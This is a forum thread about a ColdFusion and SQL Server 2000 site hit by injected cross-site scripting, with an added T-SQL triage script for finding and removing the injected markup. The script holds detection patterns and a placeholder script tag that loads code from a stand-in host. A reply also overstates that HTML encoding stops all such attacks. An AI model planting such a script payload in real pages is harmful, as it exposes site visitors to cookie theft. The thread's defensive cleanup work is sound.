Please help

eriweb
I have MS SQL Server 2000 with ColdFusion 5. I have converted most of the queries to stored procedures, and our site is getting hacked. They have managed to create a table, and in one particular existing table they are appending the following into every row:
Cross-Site Scripting

comprug
Forum Regular
Fidel,
what the hackers are attempting to do is quite serious. Basically they are trying to steal your users' cookies, as well as information about their browsers. They are trying to get access to any account that is authenticated over a web form on your site. As for what they have appended, did they do it to every existing row only, or to every existing row and every new row? If the latter, you have to think about how everything is being appended. It could be at the CF level, or it could be at the MSSQL level. Try creating a row manually, and see if it's appended. If so, it goes farther than the CF level. Also, take a look at all your stored procedures, and see if there is anything suspicious in there. Personally, I would not keep a website running that was outputting stuff like that, but taking the site down might not be an option. This will be tedious, but you can use a replace function with all cfoutput tags to replace that bit with nothing:
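The checks comprug suggests (find what the attacker created, find out whether rows are modified at the database level, review the stored procedures, and strip the appended fragment) can all be done directly in T-SQL rather than on every cfoutput. The script below is an added example, not code from the thread, written against the SQL Server 2000 system tables; the table name Articles, its columns ArticleID and Body, and the value of @payload are placeholders that have to be replaced with the real ones. Stripping the stored fragment only cleans up what is already there; it does not stop the next injection, which is what output encoding and parameterised queries are for.

```sql
-- Added example, not code from the thread. Triage for the situation
-- described above, written against SQL Server 2000 system tables.
-- 'Articles', 'ArticleID', 'Body' and the @payload value are placeholders.

-- 1. Tables the attacker may have created: newest user tables first.
SELECT name, crdate
FROM   sysobjects
WHERE  xtype = 'U'
ORDER BY crdate DESC;

-- 2. If newly inserted rows are also modified, look for a trigger on the
--    table: that is an append happening "at the MSSQL level", not in CF.
SELECT name, crdate
FROM   sysobjects
WHERE  xtype = 'TR'
  AND  parent_obj = OBJECT_ID('Articles');

-- 3. Converting queries to stored procedures does not help when a procedure
--    builds dynamic SQL out of its arguments; list those for manual review.
--    (Long procedure bodies span several syscomments rows, hence DISTINCT.)
SELECT DISTINCT o.name
FROM   sysobjects  o
JOIN   syscomments c ON c.id = o.id
WHERE  o.xtype = 'P'
  AND (c.text LIKE '%EXEC(%'
    OR c.text LIKE '%EXEC (%'
    OR c.text LIKE '%EXECUTE(%'
    OR c.text LIKE '%sp_executesql%');

-- 4. Which rows carry injected markup right now?
SELECT ArticleID, Body
FROM   Articles
WHERE  Body LIKE '%<script%';

-- 5. Strip the exact appended fragment once, in the database, instead of
--    on every page render. @payload must be the fragment found in step 4
--    and must not contain the LIKE wildcards %, _ or [. Back the table up
--    first; the transaction lets you inspect the effect before committing.
DECLARE @payload varchar(8000);
SET @payload = '<script src="http://example.invalid/x.js"></script>';  -- placeholder
BEGIN TRANSACTION;
UPDATE Articles
SET    Body = REPLACE(Body, @payload, '')
WHERE  Body LIKE '%' + @payload + '%';
SELECT @@ROWCOUNT AS rows_cleaned;
-- COMMIT TRANSACTION once the count and a sample of rows look right,
-- otherwise ROLLBACK TRANSACTION.
```

Step 3 is the one that most often explains "we moved to stored procedures and are still being hit": a procedure that concatenates its parameters into a string and runs it with EXEC is injectable exactly as the inline query was.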
Thanks

eriweb
Hello Comprug,
Thank you for your help. I ended up surrounding the variable with the HTMLCodeFormat tag, and ever since I added that code I have not seen anything yet. I also ran the SQL Profiler and did find some of his queries, which were running under the Application Name MS SQLEM, not sure what that is. I am still running the SQL Profiler just to see if he is trying to get in through somewhere else.
comprug
Forum Regular
Fidel,
it sounds like you found a good solution; HTMLCodeFormat is better than just replacing the code because it will prevent all attacks of this type. Please post again if the problem continues.
eriweb
Hello Comprug,
Thanks for your help. Ever since I added the HTMLCodeFormat I have not seen anything, so hopefully it will stay that way. But yes, I will post again if this issue comes up again, hopefully not. Thanks.